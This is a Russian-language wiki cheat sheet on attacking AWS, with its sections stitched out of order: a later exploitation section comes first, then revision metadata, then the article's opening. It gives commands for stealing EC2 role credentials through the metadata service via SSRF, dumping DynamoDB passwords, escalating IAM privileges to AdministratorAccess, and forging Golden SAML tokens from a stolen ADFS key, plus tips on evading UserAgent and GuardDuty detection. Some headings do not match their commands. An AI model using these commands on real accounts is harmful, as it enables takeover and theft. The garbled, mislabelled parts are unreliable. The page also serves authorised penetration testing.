aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

Автоматизируйте проверку кода и оптимизируйте производительность приложений с помощью рекомендаций на базе машинного обучения

[[File:Aws codeguru.png| 1000px]]

https://aws.amazon.com/ru/codeguru/

Разделяется на следующие части:

- Reviewer - выявляет критические проблемы, уязвимости системы безопасности и трудноуловимые ошибки + дает рекомендации (языки Java и Python) - статикой.

- Profiler - выявление самых дорогостоящих строк, повышение производительности и тд засчет запуска в среде выполнения. Важно особенно для тех, кто платит за время работы скриптов.

Также на странице есть упоминание про их игру - BugBust

https://us-east-1.console.aws.amazon.com/codeguru/bugbust/participant#/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

Сервис по извлечению ценной информации из текста и работе с ним.

[[File:Aws comprehend.png|1000px]]

Список категорий, на которые может разбить текст, есть на фото выше.

Для пользовательских настроек есть несколько параметров:

- Кастомные классификации

- Кастомные определения вставок в тексте

- Endpoints - для real-time работы. !!! Достаточно дорогой сервис. В месяц берет 1400$ при минимальной сборке, поэтому если злоумышленник сможет запускать в нем Endpoint'ы в большом количестве, то компания обанкротится.

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

Собирает метрики из различных сервисов и детектит различные аномалии. Проще говоря, делает статистику по метрикам и с машинным обучением находит ошибки.

Источники метрик:

* CloudWatch

* AWS Config

* CloudTrail

* X-Ray

Если рассуждать со стороны злоумышленника, то если у него есть доступ к DevOps Guru, то у него также есть AIM-роль "Amazon DevOps Guru_Role" и привилегии на доступ к следующим ресурсам:

* Amazon CloudWatch

* Amazon CloudWatch Events

* Amazon CloudWatch Logs

* AWS CodeDeploy

* AWS CodePipeline

* AWS CloudFormation

* AWS CloudTrail

* AWS Systems Manager

* AWS X-Ray

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-17T14:14:53Z

Drakylar: /* DevOps Guru */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

